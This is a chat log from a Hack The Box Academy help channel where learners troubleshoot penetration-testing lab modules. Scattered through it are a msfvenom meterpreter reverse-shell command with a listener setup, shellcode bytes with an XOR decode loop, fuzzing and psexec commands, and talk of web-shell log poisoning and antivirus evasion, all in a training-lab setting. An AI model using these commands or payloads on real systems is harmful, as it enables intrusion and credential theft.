#modules

Hi I'm doing the Windows Fundamentals - NTFS vs File Sharing Module. I'm connected to the VPN on my virtual machine and have a route to the 10.129.0.0/16 network yet I am unable to ping the target machine on that network. However, I am able to RDP into the machine fine. Does anyone know what the problem could be? I've restarted my machines and vpn connection a couple times with no success.

@civic inlet can you please help me on the dacl attacks skills assessment 🫠

Hello

i need help with hacking wordpress skills assessment i tried every way ik to find the wordpress but nothing indicates that there is wordpress on the target

pls be nice am new to pt🥺

https://academy.hackthebox.com/module/17/section/64

Take a look at the source code of the website.

nothing
even waplyzer didnt detect
curl
nmap
etc

Look at the website in your browser and look at the source code

am sorry but i really cant find anything🥲

WHAT

THE FFF
Found it

damm i didnt see that comming nice one

Guys, is there some book or even youtube channel to complement the study of the module 'Pivoting, Tunneling, and Port Forwarding' ? I'm okay with the questions and all, but I'm having a little trouble at understanding the full concept of it...

Hi

Don’t know any channel but check Ligolo out if you haven’t already - literally helped me skip the whole module

i am trying to solve the PtC module 2nd question i have been try to get the certificate by using printer bug but i dont know why i am not able to do it like i did create relay server with impacket and then used printerbug.py to authenticate but no luck

hi, im currently stuck on pass attacks credential hunting in network shares

tried different patterns but still to no avail

Of course!

Send me a DM

do you happen to know the direction to go for credential hunting in network shares?

Hey, have a question for the peeps woking on the CPTS. I'm at the File Transfers module. I have been using a VM for everything and this section requires Windows, is everyone using pwnbox or are you actually using a Windows VM?

send me a DM and what question you're on!

Doesn’t it ask you to use rdp?

It does, inside pwnbox. I was wondering if I could do it without pwnbox and on my own vm?

You can rdp in your own VM

you can RDP using your own VM

Figured it out thx!

hi im doing the pivoting and doing it with SSH and proxychains, i used nmap -sT but it doesnt show me any ports are open.
ofc i can use ligolo but is ssh proxychains bugged?

i can still xfreerdp but nmap -sT and msfconsole rdp_scanner just doesnt work

The same instructions

ok turns out sudo needs to be added before proxychains for nmap to work

• 0 What host can this user access via WinRM? (just the computer name)
  Active Directory Enumeration & Attacks
  Page 23
  Privileged Access
  Privileged Access
  how can i get the answer

anyone

?

!help

Bot Messages Empty?
@vestal thistle makes use of message embeds as output for most commands. Please note that having "Link Preview" disabled will not make these embeds show in your client. Enable User Settings → Text & Images → Link Preview → Show website preview info from links pasted into chat. to fix this.

need help

hello anyone

nobody even replying

just be patient smh

can you check please

The information needed to complete that is within the module and sections

It is above a Tier 0 module, so spoilers should not be shared

(look at the pinned channel message)

umm very few times its no

Staff and moderators are not here beck and call to help with content, sorry

@ocean night i think htb should need to reorder some modules

of cpts path

Fair, some modules do require you to use your imagination and resourcefulness

The ability to learn, adapt and research.. it's a fundamental skill

and taught, in a fundamental module 😉 https://academy.hackthebox.com/course/preview/learning-process

If we gave all the answers flat out in each section, there would be no challenge at all

that's ok but in some moduels you teach advanced stuff about services but inthe next module we need to study what is that service and how it works....that should be before advacned stuff

We welcome feedback, do you have an example please? (or you can mention it in #1234357888114364508)

true

The first few modules in the path do cover many basics I think?

Again, I'm not saying you are wrong

i dont think so

I would love to hear feedback

i am open to explain extensively with examples...

should i dm you ?

Could you open a thread in #1234357888114364508 please?

That is the place for Academy feedback for things like this I believe

ok

I can then follow up afterwards, unless someone beats me to it

Thank you!

no problem

someone help me on that i am still stuck on this

i think its about spraying the creds

yes its not working

umm

i dont remember that one its a long time i have done that

you can dm me

share me link

can anyone give me a nudge on pass attacks "Credential hunting in network shares"?

Appreciate you ignoring me, thanks @deep hemlock

Have a LOVELY DAY

someone help me with lab in module Password Attacks/Pass the Certificate lab im really stuck on the administrator flag

@open wyvern a little manners goes a long way, but keep in mind that module you are asking about is above Tier 0, just like I said for another query a little bit above.. and as it says in the pinned message

So please take any assistance you get to DMs.

You can dm me @open wyvern (just you)

no one wants to help me 😭

looks like being rude is key 🤣

https://tenor.com/view/angry-angrypanda-panda-mad-commercial-gif-1686382995209837276

sure @robust sun , you can dm me too

tell me everything you got

Any teams for holmes ctf

This is for Academy modules

ask in #1404302368186826762

👆

Thanks

Hi, could someone please give me a hint for the Skill Assessment for Insecure Output Handling Module in the AI Red Teaming Pathway? I have been going at it since 2 days and haven’t gotten anywhere

I cant find password to do this I need help
https://academy.hackthebox.com/module/143/section/1508

did you... ssh into the machine like instructed?

(seen a few people miss this part)

yes and 1 problem I dont know the credentials for it

i like lost what the creds were, if i can get trhe creds i can do the task

the credentails are in your question

no dude like, i know the creds to SSH

but when it prompts u the pass to do the secretsdump.py it just doesnt work

this is a violation 3 people laughing at me i feel humiliated 💀

might need to do another step first

Do you know which creds you need?

kind of yes, but i cant get them because i dont know what lab provided the creds

I'd look at the previous section.

thats the thing the previous section in the module was without creds

so now i dont even know 😭

I'm pretty sure the previous section says something like RDP to...with user...

I ran into that same issue. Previous section of the modules credentials were needed, didnt say it in the next section.

Hey guys on the thick client applications module and got the fatty-server but says corrupt followed exact instructions anyone else having this issue??

PleSe someone respond spent days dealing with this module on slow internet as well

someone must of done this just need some help b4 time runs out starting again for 100x time

Anyone on here done this module please direct message me the instructions for this module are wrong not accurate I have spent hours and hours I always direct message people helping them so please do same im 95% complete so this is very fustrating

you completing the Linux priv esc module?

Yeah

https://stackoverflow.com/questions/45860784/bin-bash-command-not-found-in-alpine-docker

seems intentional, alpine does not have /bin/bash OOTB. Removing in case it spoils anything.

wil dm ya

Hi guys... https://academy.hackthebox.com/module/23/section/254 I was doing this module and im stuck on gettign the flag, I have attached the error im getting, the screenshot showing the http sever is working, to show that curl is working and that I used double base64 encoding

hello,

Does anyone have issues starting academy instances ?

it keeps loading

For anyone that has the same problem with inetsim exedcutable on their own vms, it worked on parrot for some reason

https://academy.hackthebox.com/achievement/2126239/34

Got the issue for the labs on Footprinting module.

type shit

Does anyone know how to change tje port bloodhound runs from? Default is 8080.

I m using a kali vm and i just run bloodhound and it spins up

But want to change the port it starts from

Trouble spawning any target at any section / module . Any help ? Tried switching vpn servers with no luck

same here

good to know

Is HTB Academy Down?

10 min ago I guess

https://i.pinimg.com/originals/e6/63/d0/e663d00434b85c39d8ce308d4438aa08.gif

DAMN

Do they know about it though ?

ping them!!

Hi, quick question is there any courses or modules on reverse? I know there is intro ASM and Malware Analysis are they complete?

That tells us nothing

No...

Yup. 15 minutes or so now

spinning wheel of death

ive changed VPN, didnt change

also, why my name is jordan mc verify

have you verified Jordan? #welcome would be first place to check you've done everything

I recognize that i totally skip rules and welcome channel

My labs just deployed now... issue stopped for me

yep confirmed

has anyone completed "Introduction to Windows Evasion Techniques" im stuck at the Dynamic Analysis, none of the bypasses work for me

thanks good to know

my username also changed

Your display name will be your htb identity now

niiice

Hello! I'm steezboy, I joined this server to connect with people because I easily get bored at home since I'm finally done with my exam. Hoping to make some friends here amd looking forward to have a nice time. Nice to meet you'll 🤝

hi

How are you doing

nice

..

Hello, i am currently on the credential hunting in linux module in https://academy.hackthebox.com/module/147/section/1320. I downloaded lazagne, and installed it on my attack box using pip, and then transfered it the remote target successfully, however, when I try to run python3 lazagne.py all, i am getting a SytnaxError: Non-UTF-8 code starting with '\x9a' in file laZagne on line 2, but no coding declared'. Should I installing this a different way on the target machine or am i missing something?

@red fossil @raw adder welcome to the server, if you haven't already check out #welcome and the #rules and for general chit chat move things over to #general as this channel is for assistance with HTB Academy modules and not a general channel for chatting.

Good

I could be mistaken, but you might have to use python2.7 at least that is what is shown in the section, however I haven't looked at the python version recently. Actually, I just looked at my notes, and I used python3 so when you transferred lazagne.py to the target, did you move the entire directory or just the script?

https://academy.hackthebox.com/module/77/section/852

I have no clue why its just sitting here not loading

i just moved the script after i used the pip --onefile command

Try moving the entire directory over and then run it.

what is the wget command for that? i tried -r and it started transferring everything from my attack box it looked like

Research

that worked, thanks

Linux Privilege Escalation Kernel Exploits

I get this error when trying to run the exploit on the ssh machine:

/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found

Hello I'm stuck in the LinuxPRIVESC module I have to enum and finds some files can somone give a hint pls ?

compile on the target

Yeah I did that and it worked lol

anyone facing issue in accessing module labs?

https://academy.hackthebox.com/module/77/section/853

Any clue why its not working

you dont need . at the end of 8080

Okpz

Thanks

???

for the HTTP attacks, I'm looking at request smuggling section. I can't seem to get Burp's HTTP Request Smuggler extension to identify any of those vulnerabilities, even the first lab which is a CL.TE. Does anyone use that extension or have better ways of finding smuggling quickly?

Skills Assessment - WordPress

i need help with this please

for Q3:+ 3 Submit the contents of the flag file in the directory with directory listing enabled.
am not sure how to do it i been manually moving throught the dir for the past hour and i dont think thats the right way

https://academy.hackthebox.com/module/17/section/64

Hey, I'm working through the SQL injection fundamentals module, and have run into an issue where the exercises won't respond to my inputs. The page just loads indefinitely. Is it a bug, or am I doing something wrong?

It's occurred across several exercises, and I've tried copying generic queries from the lesson and still had the same problem.

It will also respond to legitimate inputs, and throw syntax errors. The issue only comes up when I actually try to inject a query.

Use the correct IP in your command.

AD enumeration and attacks SA part II Q4. I'm unable to find the user and password and looked at writeups, is there a method to find the password or is it just guesswork.

I tried it on pwnbox instead of my pc and it worked. 🤷‍♂️

problem solved i guess

Hi

Can any1 help

i hope by writeups you're referring to the annual sub writeup and not anything else. Because those other writeups break ToS

Linux Privilege Escalation Python Library Hijacking

After putting in the two scripts into the python file using vim, I get this error when trying to run the file itself:

Traceback (most recent call last):
  File "/home/htb-student/mem_status.py", line 2, in <module>
    import psutil 
  File "/usr/local/lib/python3.8/dist-packages/psutil/__init__.py", line 25
    from __future__ import division
    ^
SyntaxError: from __future__ imports must occur at the beginning of the file

doesn't make it ok.

The academy module writeups break the rules?!

No. Only the ones on third party websites

oh

anyways, any hints for this

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

To clarify btw I mean the writeup you'd have access to via an annual sub

Weak passwords are great

"Use a common method to obtain weak credentials" this q right? @haughty fiber

hey there is this question I've been stuck with for so long and it's getting boring

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

I'm almost done with the Linux Fundamentals module and yet I can't solve this one, not even with the help of ChatGPT

break the question down into what it's asking

• listening
• IPv4 only
• Not localhost

most tools (like netstat) have an option to only select IPv4

yep that's what I've been trying

wait I'm supposed to find IPV4 only??

localhost: any ip in the range of 127.0.0.1 -> 127.255.255.255

but the question specifically says all interfaces

all interfaces (Not on localhost AND IPv4 ONLY

• NOT localhost
• ONLY IPv4

it's in the brackets

that was unclear 🤦‍♂️

reading the whole question can be helpful, but i can understand how it can come across

imo the order of operations should be flipped (IPv4 only and Not on localhost)

well the answer is till wrong 🙁

are you ssh into the target system?

yeah it should be

definitely

so you see htb-student@...$ ?

(i.e. you did ssh htb-student@ip)

yep, htb-student@nixfund:~$

so I am in the target system

sometimes you may need to use grep to filter out even more info

and I am not counting the header (first line of output)

pro tip: remove the pipe to wc -l at the end

why remove it?

so you can see what you're receiving before it's going out to count

it allows you to check what you could be missing

grep -v can be useful as well

well I see what I'm receiving, but the problem is I don't understand it all 🙃

(-v is reverse grep, meaning it selects everything that isn't the pattern you provided)

dm me

Oh, I was just doing this section last week. And yeah, it's a bit of a problem those questions assume some of the networking knowledge

it's also a case of breaking down the question

which isn't an easy skill tbqh

the question is asking for a few qualifiers as i listed here

I found the answer only after counting them manually, lol. I thought the proper flag for "listening" was enough to get the listening services... But apparently not, that last netstat column "state" got me

yeah thats the one

keywords in the question: Common method, Weak Credentials

it is somewhat of a guessing game (at least with weak passwords) but the module gives you an idea of what one may look like iirc

ight

sorry for a stupid question, but why doesn't my module eat this answer

see how its mention in the module sometime "-" makes it wrong

still

What module is this ?

||omit the word „cable“||

still

BTW, anyone doing the module AI DATA ATTACKS, I highly suggest to use Google Collab notebooks, with GPU runtime (you'll save a ton of time) and it's free 🙂

i am currently studying in the cbbh plan and specifically in the file inclusion module (Log poisoning section), i was trying out the server log poisoning method but when i inject the web shell and try to call it i don't get any output at all. Could someone help me figuring it out?

Thanks in advance

it's expecting the word to be hyphenated

it's in the reading

What’s the question

Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd

the session poisoning method worked, but i wanted to try log poisoning but i can't get it through (i have solved the question but i cant use the log poisoning way)

make sure you utilize the proper quote type to not break the log

Hello, i am currently on the credential hunting in linux module in https://academy.hackthebox.com/module/147/section/1320. I found the passwd.bak and shadow.bak files for theuser account for will. I have http.server running on the target and am able to see the files, it lets me download the passwd.bak file but not the shadow. i have tried the browser path and then tried wget from my attack box. It gives an error for that file on both. Anyone have a minute to help?

yeah i have noticed that the logs broke everytime lol (ill give it a try)

In the "intro to white box pentesting" -> command execution task.
Should I not be able to run a curl command on the target machine? it works on my own local machine yet when using the same payload it freezes the target

Is there some who I can dm about trying to get Suricata to generate fast.log on the Skills Assessment. Module: Working with IPS/IDS, Section Skills Assessment: Suricata. I have the answer already, but I'm trying to generate the log to help understand how it all works

it worked i had to change the "cmd" to 'cmd', big thanks

Question about the intro to assembly language skills assessment (test 2). Is it normally that the given code doesn't even print the flag? (I created a flg.txt file to test if the code works before trying it on the target, but it never prints the flag.)

Is that normal and we are supposed to not only make the file smaller, but also change it so that it works in the first place?

guys, can somebody explain to me if I'm doing something wrong or is the third target machine that is actually down?

proxifier needed some better configuration, now it works just fine.

I can immediately see you don't have Proxifier setup correctly because there's no entry in there

Yeah, I was adding the 127.0.0.1 1080 but everytime I cliked "OK" the proxifier immediately erased the config.

So I had to manually input a rule to mstsc.exe to use the config I did before, then it worked

Hi community, I am mew in this world, I have questions, someone can explain me how make the question #2 and #3 of system information of Linux fundamental, sorry for my English, I'm just learning

1. Break it down to smaller problems

I can help in DMs when i finish my final module for CPTS

Are you properly logged into the host machine or just using the pwnbox instance? That was my first mistake even though it is clear and says "Click here to spawn the target system"

Hello with regards to Pivoting / Tunelling module of CPTS . i am not able to get the Meterpreter session established. just wonder if there is any error in my multi/handler.

use exploit/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run

For the msfvenom payload when i created, this is what i use.
msfvenom -p windows/x64/meterpreter/reverse_http lhost=172.X.X.X -f exe -o backupscript.exe LPORT=8080

Did You send the exe to the target?

You need to run the multi handler and then run the exe un target

ohya. i was thinking of that at first. thanks haha

If You create the exe in port 8080 You need to set lport in 8080 not 8000

do i need a high level GPU?

In the instance of HTB online

I appreciate it

http attacks TE.CL is getting me good

Definitely not a clear explanation on the section either. Required other writeups of TE.CL attacks to figure out why this writeup was doing what it was. But apparently still not enough to understand it enough to get the flag

Module: whitebox attacks
Section: skills assessment

Hello everyone!
Got stuck on this task.
Can I have some help?

Sorry mate, I'm into the HTB JCA certificate so I can't help u

Hey, you can dm me 🙂

anyone around for a nudge pls on LogRotate, linux priv esc module. Confusion is real

Guys what about this ?

hello

M

làm sao để chat được với các đoạn chat khác vậy

english only please

sorry

how to text in general chat

read #rules and then #welcome

If you do it on your computer, i think the module says it could take a little bit to train some of the models depending on your computer. But it was done on a MacBook Air M1 and apparently it took around 15 mins. I ran it on Google Collab with a GPU runtime (again, fully free), and the trainings took 5 - 10 seconds 🤷‍♂️

In the section "Constrained Delegation from Linux," I encountered the following issue in the final step:
And this is my /etc/hosts：
10.129.205.35 inlanefreight.local inlanefreight
10.129.205.35 DC01.inlanefreight.local DC01
Can someone please help me?

psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug
Impacket v0.13.0.dev0+20250828.31428.57693365 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket
[+] StringBinding ncacn_np:DC01[\pipe\svcctl]
Traceback (most recent call last):
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/nmb.py", line 905, in _setup_connection
sock.connect(sa)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/EGG-INFO/scripts/psexec.py", line 125, in doStuff
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1359, in connect
return self._transport.connect()
...
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/nmb.py", line 908, in _setup_connection
raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
OSError: [Errno Connection error (DC01:445)] timed out
[-] [Errno Connection error (DC01:445)] timed out

Can someone please help me?

@tough wing please try to switch DC01 and DC01.inlanefreight.local in order in /etc/hosts

Thank you, but it was not successful.

what if you combine the two lines into one? Just saw you had two lines for the same IP

Into to Binary Exploitation
Skill Assessment
Task 1 :
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

I am using this code not getting the shell code

global _start

section .text
_start:
mov rax,0xa284ee5c7cde4bd7
push rax
mov rax,0x935add110510849a
push rax
mov rax,0x10b29a9dab697500
push rax
mov rax,0x200ce3eb0d96459a
push rax
mov rax,0xe64c30e305108462
push rax
mov rax,0x69cd355c7c3e0c51
push rax
mov rax,0x65659a2584a185d6
push rax
mov rax,0x69ff00506c6c5000
push rax
mov rax,0x3127e434aa505681
push rax
mov rax,0x6af2a5571e69ff48
push rax
mov rax,0x6d179aaff20709e6
push rax
mov rax,0x9ae3f152315bf1c9
push rax
mov rax,0x373ab4bb0900179a
push rax
mov rax,0x69751244059aa2a3
push rax
mov rbx,0x2144d2144d2144d2

mov rdx, rsp          
add rcx, 14         
sub rsp,8
call decode_loop

decode_loop:
xor [rdx], rbx
add rdx, 8
loop decode_loop

I tried it, but it still failed.

If Anyone can add something to this

yo guys im on web fuzzing using ffuf

im trying to fuzz a GET parameter

im using this command ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key

ive set an ip for academy.htb in /etc/hosts (made sure its same as the live target)

add admin.academy.htb also

but im not getting any 200 OK response

youre the goat

First add it and try

I personally advice you to take language and programming skills in other places cause in hackthebox they are not explained as well as on other platforms imao

can I get a sanity check for the skill assessment in the "intro to whitebox pentest"? I'm using one of the course attacks, it works in the debug machine but not on prod

Ive begun the penetration testing path but am wondering wether there are any modules I should complete before this (i finished learning one )

working on Active Directory LDAP module on the second to last section. I have a problem with finding user account that requires a smart card for interactive logon? Can someone help me out

Hey !
In Linux privesc, I just finished the "Escaping restricted shells" section, yet I don't understand how what I did worked. Anyone available to mp & answer this question plz ?

I'd look for an OID you can use.

can you give me a hint?

UAC attributes

Hello,
I got ask a doubt why is the pawn box slow I am currently doing password attacks last assessment I got into DMZ01 and further enumerated find the password and try to use proxy chain for further enumeration of other given hosts but when I checked it’s all filtered

Is it my issue or the lab supposed to be like this

Do we need to evade firewalls ??

It sounds like your pivot might not be configured correctly. When troubleshooting a pivot, I recommend checking your connection using a common port on a host that is likely to be open. Since you know the IP of the Domain Controller, I would test on that host. I assume you are either using previous pivoting knowledge or what is provided in the cheatsheet?

can i get a hit for the last question "What is the userAccountControl bitmask for NORMAL_ACCOUNT and ENCRYPTED_TEXT_PWD_ALLOWED? (decimal value) "

Same hint, just do a little math with it.

I think my pivot work fine cuz i checked port listening , then tried to use nmap to scan it but 1 host is up and scan finished in 3.11 second that’s it nothing else

You can DM your input/output from you nmap scan.

Thank you so much

sup

Hello, I'm stuck at Active Directory Enumeration & Attacks [module] Access Control List (ACL) Abuse Primer [section]. The second question Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? is driving me crazy i've tried all possible answers that make sense and no result. Can someone maybe help me with answer format?

It's legit in the reading. Maybe run a keyword search for the attack.

Yeah i was focusing on a specific ace turns out they wanted the generic one a little bit frustrating don’t you think

Kinda random not exactly module related but not sure where to ask but... Has any else had issues with burp in vmware fusion?

In the footprinting module, SMTP question 2, is there any prob with the footprinting resource? specifically the wordlist?

I tried using msf, nmap, smtp-user-enum'

isn't there a given wordlist in the resources button?

but still....

There was last time.

i downloaded tht

not working 101 entries and no results

smtp-user-enum also may require you to mess with the timing

Oh heck!

I didn't read the hint carefully

srryy, lemme try again

i don't recall if the help context menu is messed up or not but i believe it's -w or -W for the timing

once again a big sorry, msf worked!!

so sorry :' (

i'll try smtp-user-enum too

Hello, i am on the attacking ftp module (https://academy.hackthebox.com/module/116/section/1165) and i have successfully used medusa to gain credentials and log into the ftp server, and exported the flag in that user name. the module won't accept the flag or the user for the ftp server, would there be multiple correct users and flags for this module or a rabbit hole? i still have medusa running but it hasn't found anything else yet and has been running for an hour. Anyone have any idas

HTB{A..3} should be the flag (not spoiling)

ah okay, it HTB{S...9} so it must be for something different

Hey, in Linux privesc, is the module for "Privileged groups" buggy ? It talks about NXC & Docker, idk if that's the intended content ?

I don't recall it being buggy, but it's been a while since I worked through that module. It covers more than LXC and Docker, so I would attempt all areas covered in the section to determine which one makes the most sense.

Anyone else on M1 mac (Armm64), How do you use gcc to compile exploits for target x86_64 linux architectures ?

Yeah but why does the module "Privileged groups" talks about setting up LXC ?
But otherwise alright, i guess i'll see

Because it is a privileged group 🤷‍♂️ and the section is giving you more options regarding privileged groups?

anyone one else get through Introduction to Windows Evasion Techniques static analysis? the log detects that my payload isnt triggering defener but its still not giving me the flag. [09/09/2025 09:41:38] Checking...
[09/09/2025 09:41:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:42:39] Checking...
[09/09/2025 09:42:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:43:38] Checking...
[09/09/2025 09:43:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:44:39] Checking...
[09/09/2025 09:44:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus

Make sure you follow ALL of the instructions in the section

Alr thx

i did? group policy disables running it but its aes encrypted shellcode, what do you think I could be missing?

the module: password attack , Attacking Active Directory and NTDS.dit

question: On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

idk y i cant find the user even if i turn the case sensitive mode on while mutating the wordlist . any hints ?

looks like the whole activity is just bugged https://forum.hackthebox.com/t/introduction-to-windows-evasion-techniques/322348/11

Every time I see this come up it's because someone didn't follow the instructions. Generally it's not a release build, not C#, or not being a .NET Console app.. just make sure you follow all of the things they say

It works fine

So you have created a username list and then perform a password attack using a password wordlist and aren't getting anywhere?

Ya just to be clear here is what I did , converted the given names to common format with the help of the tool , then ran kerbrute with the list and made it case sensitive , any mistakes ?

You can DM as it will be easier for me.

Can anyone help diagnose lab issues? it is my own parrot box, stopping me from working on a module. I could use pwnbox but prefer it that I don't have to switch between the two for the exam when I get round to it

Context... I can't gcc compile any exploits from my box.

hi, I am having problems with the jenkins on https://academy.hackthebox.com/module/113/section/1212, nothing loads in my browser, tried multiple and multiple systems. can anyone else check if they can access that?

Hey I am kinda stuck on this question in "SOC Analyst: Security Monitoring & SIEM Fundamentals/SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)" I think I followed the instructions as intended and nothing seems to yield the answer to that question

I'm having issues too, it seems like there's a broader issue atm.

Sub-domain Fuzzing

Is anyone else unable to access the Support Bubble in the bottom-right corner?

I've got ad-block switched off

Hey guys, let me know if this is not the right place, but I think it's related to modules enough. I'm close to finish the AI Red Teamer Job path. I've loved the prompt Injection and llm output attack modules, insane, 10/10 material right there. I'm looking to go deeper and wanted to know if you had ressources to share to keep training in a practical way just like we do in the assessments from the modules. Thank you for the help, I'm already checking on my side but struggle to find playgrounds to apply what I've learned so far 🙂 THANK YOU!

Seems pwnbox doesn't have glib 2.34 needed to compile the exploits either . So not just my lab but seems maybe parrot in general? whats the fix here? I have done a few package installs from stackoverflow but nout working

Compile it on the target

ordinarily I would but gcc is not installed it says

I believe theres also the --static flag

just went to check if I can compile on target;

This is on the skills assessment but some of the lab machines also were the same

oh right not sure what static flag you're referring to, ill have a look at the man page I guess?

When compiling with gcc

ooh okay so I need the local archive libraries instead for that to work but it could do.. ill give it a go thank you

Anyone free to talk about the Windows Lateral Movement Skill Assessment?

Who all are preparing for CPTS rn?

I need some guidance on it

I am cooked fr

Pls dm me

I accidentally got root before I got first flag. but this did the trick thank you

Hello

I got a doubt with this password attacking module intro to JTR
What where is rolf’s password

Is their something missing

the GECKO is in the reading

and yes you need the WHOLE line

Okie dokie

Web Attacks Chaining IDOR Vulnerabilities

The flag does not show up after sending the correct changes and refreshing the page.

Please DM me, i am stuck for quite long, restarted VM for 6 times, changed VPN, researched, nothing seems helpful

@icy egret don't spoil module information

oh, my bad

but why am i not getting .bat ?? even though everything is followed with module, perms changed , inheritance done, restarted the .exe

will there be a skills track for wifi or no?

Hey, I'm looking for help on https://academy.hackthebox.com/module/158/section/1439. This is where I am in the instructions:

"We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges."

I'm currently using xfreerdp to connect to my target host, which is using mstsc.exe to connect to the remote host 172.16.5.19. I'm trying to copy and paste SocksOverRDP-Server.exe from the target host to 172.16.5.19, and it's not allowing me to do so. I was able to accomplish this last night, but the target reset before I could finish. I've tried stopping and restarting the rdpclip process on the remote host, and restarting mstsc.exe. Any suggestions?

SOLVED:
I restarted the target, started over from the beginning of the section, used the mstsc.exe that comes up in search results rather than C:\Windows\System32\mstsc.exe (didn't check their locations to see if they were different), and did a manual copy paste of the file. It worked this time.

Hey is there some issues with this question,

Which architecture is known for decentralized data sharing without a central server?
Ans-P2P Architecture

Not sure what the context is here. What module are you struggling with?

Network Foundations

have you tried without the word "architecture"

Can you link the section? And what's the issue? Your answer P2P Architecture is not accepted?

I used pwd for the path, but it's not correct.
The question is:
What is the path to htb-student's home directory?
How do you answer that?

check the env

https://academy.hackthebox.com/module/289/section/3242

also did you try the full thing and not the abbreviation?

a-to-a for instance

yes i tried that as well peer-to-peer

did you try without the word "Architecture"

:)

nice that works thanks alot

lol

How to check it?

i put env like that on purpose

i suggest looking into the commands that are given to you by the module

iirc the module gives you a list of common commands

Yes, I try in many ways, I copy the result of de pwd:
/Home/.../

i don't recall /Home/ being a directory

/home/ however

but it sounds like you're not ssh into the target

ssh htb-student@spawnedIP (spawnedIP is the IP that spawns from "Click Here To Spawn Target!")

spawn instance starts the in-browser pwnbox which is NOT the target, it's just an in-browser attack box you can use instead of your own vm

I don't understand, I used the pwnbox, and the question is for the path, I don't know much about Linux and I use this command because it is the one I know is pwd

For find paths

Hi everyone, I am taking part in "Pivoting,Tunneling and Port Forwarding" Module, but the problem I faced is proxychains works on xfreerdp but failed to scan ports with nmap in target host. The nmap command I use "proxychains nmap 172.16.5.35 -Pn -sT" but the result shows ignored which is different with the tutorial sample. Did anyone faced the same problem?

Noted, will try it later and thanks for replying.👍

Just did that section now and faced an issue setting up my dynamic port forwarding for the knowledge check. Makes me wonder if its because of a poor connection? Just seemed a bit unreliable but could just be me being silly

Did you checked your /etc/proxychains.conf?

Does anyone have a module relating to bloodhound

Active Directory Enumeration & Attacks

i saw it already dw

then youtube is your best teacher

wow, its nice, thx

Look up ippsec bloodhound on youtube

hi im doing RDP and SOCKS Tunneling with SocksOverRDP and the rdp for the dc, the second hop, doesnt work

is there a way to color code my report for sysreptor so it can be clear?

Hello

In the CPTS Documentation and Reporting Module. The course resources has a Sample Obsidian Note Book how do i open this in Obsidian. There is no Open Folder or Directory option i can see.

Hey do u know how to color code report?

im tryna make it look better

Depends on what you mean by color code. If you mean syntax highlighting just put the language after the ```

im tryna make the important parts in a different colour

like text

No clue I didn't do that, I usually just bolded or italized important stuff in my report.

Oh, i was tryna make it clear to read thats why

You can also do inline code blocks `like so`: like so

o

cant i just take my report in microsoft word and colour it?

I don't know, I didn't really care how my report looked, I more so cared about the content

oh okay

Hi everyone 👋

I’m Shaheer, aka Maverick, from Pakistan 🇵🇰.
I’m here to connect with like-minded folks in penetration testing, exploit development, and red teaming.

I mainly focus on malware development (maldev) and Windows exploitation. I’m still a learner, not formally certified yet, but I’ll be attempting CRTO this month and then moving towards some OffSec certs.

Looking forward to sharing knowledge, learning from you all, and geeking out on offensive security together! 🚀

Sir, this ain't linkedin, this is the #modules channel for discussion of HTB modules

i did it, but the module path is not the same with the exercise, not only the user matt but change perms as well

cool, you can browse multiple available channels that are suited for your preferences (maldev,web, red teaming ...) in the server and engage with like minded people.

Oh I'm sorry I didn't mean that
I just connect with people that have the same ambition

Didn't knew sorry for that

I'll keep that in mind next time

module password attack : Attacking Active Directory and NTDS.dit
On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

i just wanna know which wordlist do i use ,, (if ur answer is rockyou then there are multiple rockyous , so)

Any staff can contact me regarding HTB Business CTF writeup prizes? We haven't heard back for a couple of months now 😓

I tried messaging author and they pointed me to panawesome and makelariss but nobody responded at all. I think they forgot about business CTF haha

@fair hornet @rustic rain ^

